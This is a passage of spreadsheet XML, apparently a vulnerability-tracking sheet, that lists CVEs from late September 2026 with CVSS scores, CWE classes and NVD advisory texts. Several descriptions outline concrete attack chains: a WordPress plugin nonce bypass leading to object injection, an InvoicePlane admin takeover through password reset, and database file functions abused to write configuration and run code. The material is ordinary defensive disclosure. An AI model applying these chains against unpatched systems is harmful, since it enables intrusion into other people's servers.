          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78424</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85134</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Unrestricted upload of file with dangerous type vulnerability in Bimser Solution Software Trade Inc. EBA Plus Document and Workflow Management System allows Upload a Web Shell to a Web Server.
This issue affects eBA Plus Document and Workflow Management System: from 6.7.141 before 10.0.11.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85134</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86595</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Iron Mountain Archiving Services Inc. EnVision allows SQL Injection.
This issue affects enVision: before 260655.</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86595</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86950</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7.1 and iPadOS 26.7.1, macOS Sequoia 15.8.1, macOS Tahoe 26.7.1. Processing a maliciously crafted file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 27.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86950</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87741</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>The ConvertPlus plugin for WordPress is vulnerable to Deserialization of Untrusted Data in all versions up to, and including, 3.6.3 via the style parameter of the cp_display_preview_modal AJAX action. The vulnerability exists because the action's nonce guard is gated behind an isset() check and fails open when the cp_admin_page_nonce parameter is omitted entirely, no capability check is performed on the callback, and sanitize_text_field() — applied to the $style value before it is concatenated directly into a shortcode string evaluated by do_shortcode() — does not strip shortcode delimiters, allowing an attacker to inject a second, fully attacker-controlled [smile_modal] invocation that causes smile_modal_popup() to pass attacker-supplied base64-decoded bytes to maybe_unserialize() with no allowed_classes restriction. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP object.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t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87741</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88808</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr">
        <is>
          <t>rust, suse</t>
        </is>
      </c>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified within Rancher Manager where the Fleet agent wrote resources to downstream clusters using its own cluster-admin credentials instead of the ServiceAccount pinned to the deployment. It affects multi-tenancy environments where different tenants share the same downstream clusters, for example different privileged or untrusted teams inside the same organization. This could lead to overwritten configuration files.
This issue affected SUSE Rancher Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, and 0.14 before 0.14.11.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88808</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90926</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>Improper Control of Generation of Code ('Code Injection') vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Code Injection.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90926</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100371</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, an authorization guard to Users::change_password(), was added to address a previous authorization flaw that allowed a secondary administrator (user_type=1, user_id != 1) to directly change the password of the primary administrator (user_id=1) through users/change_password/{id}. That remediation, however, protects only the direct password-change operation. It does not protect the identity attribute that password recovery actually trusts: user_email. Users::form() applies no equivalent object-level authorization check when editing the primary administrator's account, and user_email is not included in PROTECTED_FIELDS. A secondary administrator can therefore rewrite the primary administrator's email address, then drive the public password-recovery flow — which resolves the account by user_email — to receive the reset token and take over user_id=1. The result is an alternate attack path that achieves the same impact PR #1638 was intended to prevent: cross-administrator full account takeover of the primary administrator. This issue has been patched via commit 8616fa4.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100371</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48100</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-349</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Payy is an Ethereum L2 zk-rollup for privacy preserving and regulatory compliant transactions. Prior to version 1.3.0, agg_agg forwards the compacted message stream from its inner proofs into a public messages: [Field; 1000] array, but it never checks that the unused tail of the outer array is zero. A registered prover can build a valid agg_final proof for an approved rollup block while inserting an extra burn message after the real messages. RollupV1.verifyRollup() then parses that public input as a normal burn and transfers USDC from the rollup contract to the attacker. This is a severe circuit soundness failure: the proof system accepts a public statement whose messages array is not fully derived from the verified inner proofs. On the current deployment, verifyRollup() is restricted to the existing allowlisted prover, so a fresh public caller cannot submit the invalid proof directly. That gate limits who can reach L1 today; it does not make the circuit statement sound. The issue becomes permissionless under the prover model described in the Payy whitepaper. Section 3.3.2 states: "To join as a prover, the prover is required to submit a small stake", and Section 3.3.1 states that if a prover fails to submit, "other nodes can submit the block proof instead." In that model, an attacker only needs to become a registered prover and use public validator approval data for an already approved block. This issue has been patched in version 1.3.0.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48100</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54675</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-434, CWE-73</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.10 and 17.0.5, a critical vulnerability exists in the sound language upload and conversion functionality that allows an authenticated attacker to perform arbitrary file writes, leading directly to remote code execution (RCE). Authentication with a known username is required. The vulnerability stems from insufficient path sanitization in the file conversion process, enabling path traversal attacks that place malicious PHP files in the web server's root directory. This issue has been patched in versions 16.0.10 and 17.0.5.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54675</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95104</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow vulnerability exists in BUFFALO Wi-Fi products. A non-authenticated crafted HTTP request may cause a denial-of-service (DoS) condition.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95104</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96538</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>20be33e2-bf35-4d13-8fad-18bd2f3e3659</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>postgresql, hp</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>WarehousePG (WHPG) 7.x before 7.6.0-WHPG is affected by a missing authorization vulnerability (CWE-862) in the built-in server-side file functions pg_file_write(text,text,bool), pg_file_rename(text,text,text), pg_file_unlink(text), and pg_logdir_ls(). These functions are executable by any authenticated database role with no GRANT required, because the REVOKE that contrib/adminpack applies to the equivalent functions was never carried over to WHPG core when their catalog entries were repointed to the ungated adminpack-derived implementations as part of Greenplum's merge to a PostgreSQL 12 base. A non-superuser can use pg_file_write, pg_file_rename, and pg_file_unlink to create, overwrite (append), rename, and delete files under the data and log directories, and can use pg_logdir_ls() to enumerate log file names. Because postgresql.auto.conf resides in the data directory, a non-superuser can append configuration directives such as shared_preload_libraries or archive_command to it, resulting in arbitrary code execution as the postgres operating system user on the next server restart or configuration reload. WarehousePG 6.x is not affected, as the equivalent functions there enforce a superuser check internally.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96538</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-42002</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>express, python</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>A code injection vulnerability has been discovered in the Robot Operating System 2 (ROS 2) 'ros2topic' command-line tool, affecting all ROS 2 distributions from Crystal Clemmys up to and including Lyrical Luth and Rolling Ridley. The vulnerability lies in the 'hz' verb, which reports the publishing rate of a topic and accepts a user-provided Python expression via the --filter option. This input is passed directly to the eval() function without sanitization, allowing a local user to craft and execute arbitrary code.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-42002</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101002</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Netcore NBR200V2 1.3.241127.071246. Affected is the function system of the file /usr/bin/network_tools of the component Tools Ping Handler. Performing a manipulation of the argument url results in os command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101002</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54674</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.39 and 17.0.7, users authenticated via User Control Panel (UCP) are able to execute arbitrary commands on the PBX as the webserver user (typically asterisk) using specially crafted HTTP strings. Authenticated access to UCP is required. Note that this is often more common for less-privileged users to have UCP access vs. the Administrator Control Panel (ACP) access (which is usually FreePBX higher-level administrator accounts only). Insufficient sanitization of certain URL parameters utilized by UCP did not fully account for malicious strings in these fields. This could result in binaries being executed on the host server by carefully chaining commands. This issue has been patched in versions 16.0.39 and 17.0.7.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54674</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54708</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
